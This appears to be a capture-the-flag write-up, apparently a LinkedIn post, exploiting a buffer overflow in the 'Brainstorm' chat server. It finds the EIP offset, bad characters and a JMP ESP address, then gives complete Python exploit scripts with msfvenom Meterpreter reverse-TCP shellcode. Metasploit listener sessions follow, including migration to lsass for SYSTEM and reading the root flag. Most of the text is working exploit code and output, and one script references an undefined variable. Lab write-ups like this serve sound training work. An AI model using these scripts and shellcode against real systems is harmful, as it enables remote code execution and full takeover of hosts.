9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9

Program crashed when an input of 2400 characters is sent.

Finding the EIP Offset

The value of the EIP when the program crashed is 31704330.

┌──(root??kali)-[~/Buffer Overflow/thmbfprep/brainstorm/chatserver]
└─# msf-pattern_offset -q 31704330
[*] Exact match at offset 2012

The EIP Offset is 2012.

Replacing the EIP

Script for replacing the EIP:

#!/usr/bin/env python3
import socket
import sys

total_length = 2400
offset = 2012
new_eip = b"BBBB"
username = b"vamsi"
message = b"A" * offset + new_eip + b"C" * (total_length - offset - len(new_eip))

try:
    print("Sending payload")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.57.11", 9999))
    s.recv(1024)
    s.recv(1024)
    s.send(username + b"\\r\\n")
    s.recv(1024)
    s.send(message + b"\\r\\n")
    s.recv(1024)
    s.close()
except:
    print("Cannot connect to the machine")
    sys.exit()

EIP replaced with 424242.

Finding bad characters:

Setting working folder for mona:

领英推荐

Frida Hacking

Atimi Software 2 年前

HTB Analytics Walkthrough

Cybervie-Cyber Security Services 11 个月前

AI-Led Active Exploit Report

Rootshell Security 1 年前

!mona config -set workingfolder C:\Immunitylogs\%p

Generating bytearray excluding default bad character (\x00):

!mona bytearray -b "\x00”

Script for crashing:

#!/usr/bin/env python3
import socket
import struct
import sys

total_length = 2400
offset = 2012
new_eip = b"BBBB"
username = b"vamsi"
all_characters = b"".join([struct.pack('<B', x) for x in range(1, 256)])
message = b"A" * offset + new_eip + all_characters + b"C" * (total_length - offset - len(new_eip) - len(all_characters))
try:
    print("Sending payload")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.57.11", 9999))
    s.recv(1024)
    s.recv(1024)
    s.send(username + b"\r\n")
    s.recv(1024)
    s.send(message + b"\r\n")
    s.recv(1024)
    s.close()
except:
    print("Cannot connect to the machine")
    sys.exit()

ESP when the crash happens is 018BEEC0.

!mona compare -f "C:\Immunitylogs\chatserver\bytearray.bin" -a 018BEEC0

From the output of mona, there are no bad characters except for \x00.

Finding the right module

┌──(root??kali)-[~/Buffer Overflow/thmbfprep/brainstorm/chatserver]
└─# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > JMP ESP
00000000  FFE4              jmp esp

!mona find -s "\\xff\\xe4" -m essfunc.dll

We will use 0x6250151b to replace the EIP.

Generating the Shell code

Only bad character is “\x00”.

┌──(root??kali)-[~/Buffer Overflow/thmbfprep/brainstorm/chatserver]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.57.4 LPORT=4444 -f py -b "\\x00"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of py file: 1865 bytes
buf = b""
buf += b"\xdb\xcf\xb8\xfe\x79\xc9\xa8\xd9\x74\x24\xf4\x5b\x31"
buf += b"\xc9\xb1\x59\x31\x43\x19\x03\x43\x19\x83\xeb\xfc\x1c" 
buf += b"\x8c\x35\x40\x6f\x6f\xc6\x91\x0f\x41\x14\xf5\x44\xf3" 
buf += b"\xa8\x7d\x08\xf8\x41\x64\x27\x52\x46\xec\x45\x7b\x69" 
buf += b"\x45\xe3\x5d\x44\x56\xc2\x61\x0a\x94\x45\x1e\x51\xc9" 
buf += b"\xa5\x1f\x9a\x1c\xa4\x58\x6c\x6a\x49\x34\x38\x1f\xc7" 
buf += b"\xa9\x4d\x5d\xdb\xc8\x81\xe9\x63\xb3\xa4\x2e\x17\x0f" 
buf += b"\xa6\x7e\x5c\xd7\x88\x7f\xb1\xb8\x43\x37\x2d\xbc\x9d" 
buf += b"\xbc\x71\xf7\x2c\xc2\x02\x33\xc4\x3d\xc2\x0d\x1a\xfc" 
buf += b"\x25\x60\x36\xfe\x7e\x43\xa6\x74\x74\xb7\x5b\x8f\x4f" 
buf += b"\xc5\x87\x1a\x4f\x6d\x43\xbc\xab\x8f\x80\x5b\x38\x83" 
buf += b"\x6d\x2f\x66\x80\x70\xfc\x1d\xbc\xf9\x03\xf1\x34\xb9" 
buf += b"\x27\xd5\x1d\x19\x49\x4c\xf8\xcc\x76\x8e\xa4\xb1\xd2" 
buf += b"\xc5\x47\xa7\x63\x26\x98\xc8\x39\xb0\x54\x05\xc2\x40" 
buf += b"\xf3\x1e\xb1\x72\x5c\xb5\x5d\x3e\x15\x13\x99\x37\x31" 
buf += b"\xa4\x75\xff\x52\x5a\x76\xff\x7b\x99\x22\xaf\x13\x08" 
buf += b"\x4b\x24\xe4\xb5\x9e\xd0\xee\x21\xe1\x8c\xd6\xb5\x89" 
buf += b"\xce\x28\xa7\x15\x47\xce\x97\xf5\x07\x5f\x58\xa6\xe7" 
buf += b"\x0f\x30\xac\xe8\x70\x20\xcf\x23\x19\xcb\x20\x9d\x71" 
buf += b"\x64\xd8\x84\x0a\x15\x25\x13\x77\x15\xad\x91\x87\xd8" 
buf += b"\x46\xd0\x9b\x0d\x31\x1a\x64\xce\xd4\x1a\x0e\xca\x7e" 
buf += b"\x4d\xa6\xd0\xa7\xb9\x69\x2a\x82\xba\x6e\xd4\x53\x8a" 
buf += b"\x05\xe3\xc1\xb2\x71\x0c\x06\x32\x82\x5a\x4c\x32\xea" 
buf += b"\x3a\x34\x61\x0f\x45\xe1\x16\x9c\xd0\x0a\x4e\x70\x72" 
buf += b"\x63\x6c\xaf\xb4\x2c\x8f\x9a\xc6\x2b\x6f\x58\xe1\x93" 
buf += b"\x07\xa2\xb1\x23\xd7\xc8\x31\x74\xbf\x07\x1d\x7b\x0f" 
buf += b"\xe7\xb4\xd4\x07\x62\x59\x96\xb6\x73\x70\x76\x66\x73" 
buf += b"\x77\xa3\x99\x0e\xf8\x54\x5a\xef\x10\x31\x5b\xef\x1c" 
buf += b"\x47\x60\x39\x25\x3d\xa7\xf9\x12\x4e\x92\x5c\x32\xc5" 
buf += b"\xdc\xf3\x44\xcc"

Script to run the exploit:

#!/usr/bin/env python3
import socket
import struct
import sys

total_length = 2400
offset = 2012
new_eip = struct.pack("<I", 0x6250151B)
username = b"vamsi"
buf = b""
buf += b"\xdb\xcf\xb8\xfe\x79\xc9\xa8\xd9\x74\x24\xf4\x5b\x31"
buf += b"\xc9\xb1\x59\x31\x43\x19\x03\x43\x19\x83\xeb\xfc\x1c" 
buf += b"\x8c\x35\x40\x6f\x6f\xc6\x91\x0f\x41\x14\xf5\x44\xf3" 
buf += b"\xa8\x7d\x08\xf8\x41\x64\x27\x52\x46\xec\x45\x7b\x69" 
buf += b"\x45\xe3\x5d\x44\x56\xc2\x61\x0a\x94\x45\x1e\x51\xc9" 
buf += b"\xa5\x1f\x9a\x1c\xa4\x58\x6c\x6a\x49\x34\x38\x1f\xc7" 
buf += b"\xa9\x4d\x5d\xdb\xc8\x81\xe9\x63\xb3\xa4\x2e\x17\x0f" 
buf += b"\xa6\x7e\x5c\xd7\x88\x7f\xb1\xb8\x43\x37\x2d\xbc\x9d" 
buf += b"\xbc\x71\xf7\x2c\xc2\x02\x33\xc4\x3d\xc2\x0d\x1a\xfc" 
buf += b"\x25\x60\x36\xfe\x7e\x43\xa6\x74\x74\xb7\x5b\x8f\x4f" 
buf += b"\xc5\x87\x1a\x4f\x6d\x43\xbc\xab\x8f\x80\x5b\x38\x83" 
buf += b"\x6d\x2f\x66\x80\x70\xfc\x1d\xbc\xf9\x03\xf1\x34\xb9" 
buf += b"\x27\xd5\x1d\x19\x49\x4c\xf8\xcc\x76\x8e\xa4\xb1\xd2" 
buf += b"\xc5\x47\xa7\x63\x26\x98\xc8\x39\xb0\x54\x05\xc2\x40" 
buf += b"\xf3\x1e\xb1\x72\x5c\xb5\x5d\x3e\x15\x13\x99\x37\x31" 
buf += b"\xa4\x75\xff\x52\x5a\x76\xff\x7b\x99\x22\xaf\x13\x08" 
buf += b"\x4b\x24\xe4\xb5\x9e\xd0\xee\x21\xe1\x8c\xd6\xb5\x89" 
buf += b"\xce\x28\xa7\x15\x47\xce\x97\xf5\x07\x5f\x58\xa6\xe7" 
buf += b"\x0f\x30\xac\xe8\x70\x20\xcf\x23\x19\xcb\x20\x9d\x71" 
buf += b"\x64\xd8\x84\x0a\x15\x25\x13\x77\x15\xad\x91\x87\xd8" 
buf += b"\x46\xd0\x9b\x0d\x31\x1a\x64\xce\xd4\x1a\x0e\xca\x7e" 
buf += b"\x4d\xa6\xd0\xa7\xb9\x69\x2a\x82\xba\x6e\xd4\x53\x8a" 
buf += b"\x05\xe3\xc1\xb2\x71\x0c\x06\x32\x82\x5a\x4c\x32\xea" 
buf += b"\x3a\x34\x61\x0f\x45\xe1\x16\x9c\xd0\x0a\x4e\x70\x72" 
buf += b"\x63\x6c\xaf\xb4\x2c\x8f\x9a\xc6\x2b\x6f\x58\xe1\x93" 
buf += b"\x07\xa2\xb1\x23\xd7\xc8\x31\x74\xbf\x07\x1d\x7b\x0f" 
buf += b"\xe7\xb4\xd4\x07\x62\x59\x96\xb6\x73\x70\x76\x66\x73" 
buf += b"\x77\xa3\x99\x0e\xf8\x54\x5a\xef\x10\x31\x5b\xef\x1c" 
buf += b"\x47\x60\x39\x25\x3d\xa7\xf9\x12\x4e\x92\x5c\x32\xc5" 
buf += b"\xdc\xf3\x44\xcc"
shellcode = buf
nop_sled = b"\x90" * 32
message = b"A" * offset + new_eip + nop_sled + shellcode + b"C" * (total_length - offset - len(new_eip) - len(all_characters) - len(nop_sled) - len(shellcode))
try:
    print("Sending payload")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.57.11", 9999))
    s.recv(1024)
    s.recv(1024)
    s.send(username + b"\r\n")
    s.recv(1024)
    s.send(message + b"\r\n")
    s.recv(1024)
    s.close()
except:
    print("Cannot connect to the machine")
    sys.exit()

Setting up listener using msfconsole:

┌──(root??kali)-[~]
└─# msfconsole
|                                                                              |
|                   METASPLOIT CYBER MISSILE COMMAND V5                        |
|______________________________________________________________________________|
\\                                  /                      /
\\     .                          /                      /            x
\\                              /                      /
\\                            /          +           /
\\            +             /                      /
*                        /                      /
/      .               /
X                             /                      /            X
/                     ###
/                     # % #
/                       ###
.       /
.                       /      .            *           .
/
*
+                       *
__ __ __ ####### __ __ __
/ \\ / \\ / \\ ########### / \\ / \\ / \\
################################################################################
################################################################################
WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF
################################################################################
[<https://metasploit.com>](<https://metasploit.com/>)
   =[ metasploit v6.0.45-dev                          ]
- --=[ 2134 exploits - 1139 auxiliary - 364 post ]
- --=[ 592 payloads - 45 encoders - 10 nops ]
- --=[ 8 evasion ]
Metasploit tip: View a module's description using
info, or the enhanced version in your browser with
info -d
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name  Current Setting  Required  Description
Payload options (generic/shell_reverse_tcp):
Name   Current Setting  Required  Description
LHOST                   yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen port
Exploit target:
Id  Name
0   Wildcard Target
msf6 exploit(multi/handler) > set LHOST 192.168.57.4
LHOST => 192.168.57.4
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name  Current Setting  Required  Description
Payload options (windows/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     192.168.57.4     yes       The listen address (an interface may be specified)
LPORT     4444             yes       The listen port
Exploit target:
Id  Name
0   Wildcard Target
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.57.4:4444

Execute the exploit.py script:

┌──(root??kali)-[~/Buffer Overflow/thmbfprep/brainstorm/chatserver]
└─# python3 exploit.py
Sending payload

[*] Sending stage (175174 bytes) to 192.168.57.11
[*] Meterpreter session 1 opened (192.168.57.4:4444 -> 192.168.57.11:49296) at 2023-02-07 05:35:46 -0500
meterpreter > getuid
Server username: Win7x86\vhacker
meterpreter > sysinfo
Computer        : WIN7X86
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_IN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > pgrep lsass.exe
516
meterpreter > migrate 516
[*] Migrating from 744 to 516...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN7X86
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_IN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

Final exploit of the original machine

Generating payload using msfvenom:

┌──(root??kali)-[~]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
inet 192.168.57.4  netmask 255.255.255.0  broadcast 192.168.57.255
inet6 fe80::a00:27ff:fe0e:348d  prefixlen 64  scopeid 0x20<link>
ether 08:00:27:0e:34:8d  txqueuelen 1000  (Ethernet)
RX packets 93  bytes 29814 (29.1 KiB)
RX errors 0  dropped 0  overruns 0  frame 0
TX packets 115  bytes 21613 (21.1 KiB)
TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
inet 127.0.0.1  netmask 255.0.0.0
inet6 ::1  prefixlen 128  scopeid 0x10<host>
loop  txqueuelen 1000  (Local Loopback)
RX packets 8  bytes 400 (400.0 B)
RX errors 0  dropped 0  overruns 0  frame 0
TX packets 8  bytes 400 (400.0 B)
TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
**inet 10.2.23.54  netmask 255.255.128.0  destination 10.2.23.54**
inet6 fe80::6886:c011:2334:e275  prefixlen 64  scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
RX packets 0  bytes 0 (0.0 B)
RX errors 0  dropped 0  overruns 0  frame 0
TX packets 3  bytes 144 (144.0 B)
TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(root??kali)-[~]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.2.23.54 LPORT=4444 -f py -b "\\x00"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of py file: 1865 bytes
buf =? b""
buf += b"\xd9\xf7\xbb\x38\xa8\x0e\x8c\xd9\x74\x24\xf4\x5d\x33"
buf += b"\xc9\xb1\x59\x31\x5d\x19\x03\x5d\x19\x83\xc5\x04\xda"
buf += b"\x5d\xf2\x64\x95\x9e\x0b\x75\xc9\xaf\xd9\xfc\xec\xb4"
buf += b"\x56\xac\xde\xbf\x3b\x5d\x95\x92\xaf\x52\x1e\x58\xf6"
buf += b"\xe7\x12\x75\xc7\x08\xe3\x45\x8b\xcb\x62\x3a\xd6\x1f"
buf += b"\x44\x03\x19\x52\x85\x44\xef\x18\x6a\x18\x7b\xb0\x64"
buf += b"\xca\xf0\x77\xb8\xf5\xd6\xf3\x80\x8d\x53\xc3\x74\x22"
buf += b"\x5d\x14\x24\x31\x05\xb4\xc5\x96\x3d\xfc\xdd\x9d\x8b"
buf += b"\x89\xe1\xac\xf4\x3b\x92\xfb\x81\xbd\x72\x32\x56\x11"
buf += b"\xbb\xfa\x5b\x6b\xfc\x3d\x84\x1e\xf6\x3d\x39\x19\xcd"
buf += b"\x3c\xe5\xac\xd1\xe7\x6e\x16\x35\x19\xa2\xc1\xbe\x15"
buf += b"\x0f\x85\x98\x39\x8e\x4a\x93\x46\x1b\x6d\x73\xcf\x5f"
buf += b"\x4a\x57\x8b\x04\xf3\xce\x71\xea\x0c\x10\xdd\x53\xa9"
buf += b"\x5b\xcc\x82\xcd\xa4\x0e\xab\x93\x32\xc2\x66\x2c\xc2"
buf += b"\x4c\xf0\x5f\xf0\xd3\xaa\xf7\xb8\x9c\x74\x0f\xc9\x8b"
buf += b"\x86\xdf\x71\xdb\x78\xe0\x81\xf5\xbe\xb4\xd1\x6d\x16"
buf += b"\xb5\xba\x6d\x97\x60\x56\x64\x0f\x81\xa4\x6f\xf9\xfd"
buf += b"\xaa\x8f\x14\xa2\x23\x69\x46\x0a\x63\x26\x27\xfa\xc3"
buf += b"\x96\xcf\x10\xcc\xc9\xf0\x1a\x07\x62\x9a\xf4\xf1\xda"
buf += b"\x33\x6c\x58\x90\xa2\x71\x77\xdc\xe5\xfa\x7d\x20\xab"
buf += b"\x0a\xf4\x32\xdc\x6c\xf6\xca\x1d\x19\xf6\xa0\x19\x8b"
buf += b"\xa1\x5c\x20\xea\x85\xc2\xdb\xd9\x96\x05\x23\x9c\xae"
buf += b"\x7e\x12\x0a\x8e\xe8\x5b\xda\x0e\xe9\x0d\xb0\x0e\x81"
buf += b"\xe9\xe0\x5d\xb4\xf5\x3c\xf2\x65\x60\xbf\xa2\xda\x23"
buf += b"\xd7\x48\x04\x03\x78\xb3\x63\x17\x7f\x4b\xf1\x30\xd8"
buf += b"\x23\x09\x01\xd8\xb3\x63\x81\x88\xdb\x78\xae\x27\x2b"
buf += b"\x80\x65\x60\x23\x0b\xe8\xc2\xd2\x0c\x21\x82\x4a\x0c"
buf += b"\xc6\x1f\x7d\x77\xa7\xa0\x7e\x88\xa1\xc4\x7f\x88\xcd"
buf += b"\xfa\xbc\x5e\xf4\x88\x83\x62\x43\x82\xb6\xc7\xe2\x09"
buf += b"\xb8\x54\xf4\x1b"

Final Exploit script:

#!/usr/bin/env python3
import socket
import struct
import sys

total_length = 2400
offset = 2012
new_eip = struct.pack("<I", 0x6250151B)
username = b"vamsi"
buf =? b""
buf += b"\xd9\xf7\xbb\x38\xa8\x0e\x8c\xd9\x74\x24\xf4\x5d\x33"
buf += b"\xc9\xb1\x59\x31\x5d\x19\x03\x5d\x19\x83\xc5\x04\xda"
buf += b"\x5d\xf2\x64\x95\x9e\x0b\x75\xc9\xaf\xd9\xfc\xec\xb4"
buf += b"\x56\xac\xde\xbf\x3b\x5d\x95\x92\xaf\x52\x1e\x58\xf6"
buf += b"\xe7\x12\x75\xc7\x08\xe3\x45\x8b\xcb\x62\x3a\xd6\x1f"
buf += b"\x44\x03\x19\x52\x85\x44\xef\x18\x6a\x18\x7b\xb0\x64"
buf += b"\xca\xf0\x77\xb8\xf5\xd6\xf3\x80\x8d\x53\xc3\x74\x22"
buf += b"\x5d\x14\x24\x31\x05\xb4\xc5\x96\x3d\xfc\xdd\x9d\x8b"
buf += b"\x89\xe1\xac\xf4\x3b\x92\xfb\x81\xbd\x72\x32\x56\x11"
buf += b"\xbb\xfa\x5b\x6b\xfc\x3d\x84\x1e\xf6\x3d\x39\x19\xcd"
buf += b"\x3c\xe5\xac\xd1\xe7\x6e\x16\x35\x19\xa2\xc1\xbe\x15"
buf += b"\x0f\x85\x98\x39\x8e\x4a\x93\x46\x1b\x6d\x73\xcf\x5f"
buf += b"\x4a\x57\x8b\x04\xf3\xce\x71\xea\x0c\x10\xdd\x53\xa9"
buf += b"\x5b\xcc\x82\xcd\xa4\x0e\xab\x93\x32\xc2\x66\x2c\xc2"
buf += b"\x4c\xf0\x5f\xf0\xd3\xaa\xf7\xb8\x9c\x74\x0f\xc9\x8b"
buf += b"\x86\xdf\x71\xdb\x78\xe0\x81\xf5\xbe\xb4\xd1\x6d\x16"
buf += b"\xb5\xba\x6d\x97\x60\x56\x64\x0f\x81\xa4\x6f\xf9\xfd"
buf += b"\xaa\x8f\x14\xa2\x23\x69\x46\x0a\x63\x26\x27\xfa\xc3"
buf += b"\x96\xcf\x10\xcc\xc9\xf0\x1a\x07\x62\x9a\xf4\xf1\xda"
buf += b"\x33\x6c\x58\x90\xa2\x71\x77\xdc\xe5\xfa\x7d\x20\xab"
buf += b"\x0a\xf4\x32\xdc\x6c\xf6\xca\x1d\x19\xf6\xa0\x19\x8b"
buf += b"\xa1\x5c\x20\xea\x85\xc2\xdb\xd9\x96\x05\x23\x9c\xae"
buf += b"\x7e\x12\x0a\x8e\xe8\x5b\xda\x0e\xe9\x0d\xb0\x0e\x81"
buf += b"\xe9\xe0\x5d\xb4\xf5\x3c\xf2\x65\x60\xbf\xa2\xda\x23"
buf += b"\xd7\x48\x04\x03\x78\xb3\x63\x17\x7f\x4b\xf1\x30\xd8"
buf += b"\x23\x09\x01\xd8\xb3\x63\x81\x88\xdb\x78\xae\x27\x2b"
buf += b"\x80\x65\x60\x23\x0b\xe8\xc2\xd2\x0c\x21\x82\x4a\x0c"
buf += b"\xc6\x1f\x7d\x77\xa7\xa0\x7e\x88\xa1\xc4\x7f\x88\xcd"
buf += b"\xfa\xbc\x5e\xf4\x88\x83\x62\x43\x82\xb6\xc7\xe2\x09"
buf += b"\xb8\x54\xf4\x1b"
shellcode = buf
nop_sled = b"\x90" * 32
message = b"A" * offset + new_eip + nop_sled + shellcode + b"C" * (total_length - offset - len(new_eip) - len(nop_sled) - len(shellcode))
try:
    print("Sending payload")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("10.10.53.141", 9999))
    s.recv(1024)
    s.recv(1024)
    s.send(username + b"\r\n")
    s.recv(1024)
    s.send(message + b"\r\n")
    s.recv(1024)
    s.close()
except:
    print("Cannot connect to the machine")
    sys.exit()

Setting up listener:

┌──(root??kali)-[~]
└─# msfconsole
  .:okOOOkdc'           'cdkOOOko:.
.xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
.OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
.dOOo'[WM.OOOOocccxOOOO.MX](<https://wm.ooooocccxoooo.mx/>)'xOOd.
,kOl'M.OOOOOOOOOOOOO.M'dOk,
:kk;.OOOOOOOOOOOOO.;Ok:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
   =[ metasploit v6.0.45-dev                          ]
- --=[ 2134 exploits - 1139 auxiliary - 364 post ]
- --=[ 592 payloads - 45 encoders - 10 nops ]
- --=[ 8 evasion ]
Metasploit tip: Enable verbose logging with set VERBOSE
true
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name  Current Setting  Required  Description
Payload options (generic/shell_reverse_tcp):
Name   Current Setting  Required  Description
LHOST                   yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen port
Exploit target:
Id  Name
0   Wildcard Target
msf6 exploit(multi/handler) > set LHOST 10.2.23.54
LHOST => 10.2.23.54
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.2.23.54:4444

Running the exploit:

┌──(root??kali)-[~/Buffer Overflow/thmbfprep/brainstorm/chatserver]
└─# python3 exploit.py
Sending payload

Reverse Shell:

[*] Sending stage (175174 bytes) to 10.10.53.141
[*] Meterpreter session 1 opened (10.2.23.54:4444 -> 10.10.53.141:49271) at 2023-02-07 07:28:25 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
**Computer        : BRAINSTORM**
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 0
**Meterpreter     : x86/windows**
meterpreter > shell
Process 2032 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\Windows\system32>cd C:\
cd C:\
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is C87F-5040
Directory of C:\
08/29/2019  07:36 PM    <DIR>          ftp
08/29/2019  07:31 PM    <DIR>          inetpub
07/13/2009  07:20 PM    <DIR>          PerfLogs
11/20/2010  11:16 PM    <DIR>          Program Files
08/29/2019  07:28 PM    <DIR>          Program Files (x86)
08/29/2019  09:20 PM    <DIR>          Users
09/02/2019  04:36 PM    <DIR>          Windows
0 File(s)              0 bytes
7 Dir(s)  19,594,682,368 bytes free
C:\>cd users
cd users
C:\Users>dir 
dir
Volume in drive C has no label.
Volume Serial Number is C87F-5040
Directory of C:\\Users
08/29/2019  09:20 PM    <DIR>          .
08/29/2019  09:20 PM    <DIR>          ..
08/29/2019  09:21 PM    <DIR>          drake
11/20/2010  11:16 PM    <DIR>          Public
0 File(s)              0 bytes
4 Dir(s)  19,594,682,368 bytes free
C:\Users>cd drake
cd drake
C:\Users\drake>dir
dir
Volume in drive C has no label.
Volume Serial Number is C87F-5040
Directory of C:\Users\drake
08/29/2019  09:21 PM    <DIR>          .
08/29/2019  09:21 PM    <DIR>          ..
08/29/2019  09:21 PM    <DIR>          Contacts
08/29/2019  09:55 PM    <DIR>          Desktop
08/29/2019  09:21 PM    <DIR>          Documents
08/29/2019  09:27 PM    <DIR>          Downloads
08/29/2019  09:21 PM    <DIR>          Favorites
08/29/2019  09:21 PM    <DIR>          Links
08/29/2019  09:21 PM    <DIR>          Music
08/29/2019  09:21 PM    <DIR>          Pictures
08/29/2019  09:21 PM    <DIR>          Saved Games
08/29/2019  09:21 PM    <DIR>          Searches
08/29/2019  09:21 PM    <DIR>          Videos
0 File(s)              0 bytes
13 Dir(s)  19,594,682,368 bytes free
C:\Users\drake>cd Desktop
cd Desktop
C:\Users\drake\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is C87F-5040
Directory of C:\Users\drake\Desktop
08/29/2019  09:55 PM    <DIR>          .
08/29/2019  09:55 PM    <DIR>          ..
08/29/2019  09:55 PM                32 root.txt
1 File(s)             32 bytes
2 Dir(s)  19,594,682,368 bytes free
C:\Users\drake\Desktop>type root.txt
type root.txt
**5b1001de5a44eca47eee71e7942a8f8a**

要查看或添加评论，请登录

Vamsi Krishna C V的更多文章

Proving Grounds Practice - Internal Walkthrough

2023年5月9日

Proving Grounds Practice - Internal Walkthrough

Quick Summary Name of the machine: Internal Platform: Proving Grounds Practice Operating System: Windows Difficulty:…

